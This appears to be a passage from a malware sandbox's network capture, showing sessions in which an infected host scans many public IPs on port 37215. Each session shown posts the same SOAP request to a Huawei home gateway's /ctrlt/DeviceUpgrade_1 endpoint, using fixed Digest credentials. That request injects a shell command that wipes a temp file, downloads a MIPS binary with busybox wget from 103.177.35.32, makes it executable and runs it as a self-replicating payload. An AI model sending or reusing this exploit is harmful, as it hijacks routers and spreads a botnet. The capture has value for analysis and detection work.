                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        77192.168.2.2341734157.22.135.137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.278845072 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        78192.168.2.233424241.140.31.6837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.278850079 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        79192.168.2.2336746197.220.217.6337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.278850079 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        80192.168.2.2338958197.181.19.8637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.278850079 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        81192.168.2.2342786191.98.176.24137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.278851986 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        82192.168.2.2356976188.86.189.18537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.278850079 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        83192.168.2.2355600157.227.136.21237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.278870106 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        84192.168.2.2334832157.42.1.18537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.278873920 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        85192.168.2.2341662197.119.18.16137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.278881073 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        86192.168.2.2333500151.30.126.21537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.279087067 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
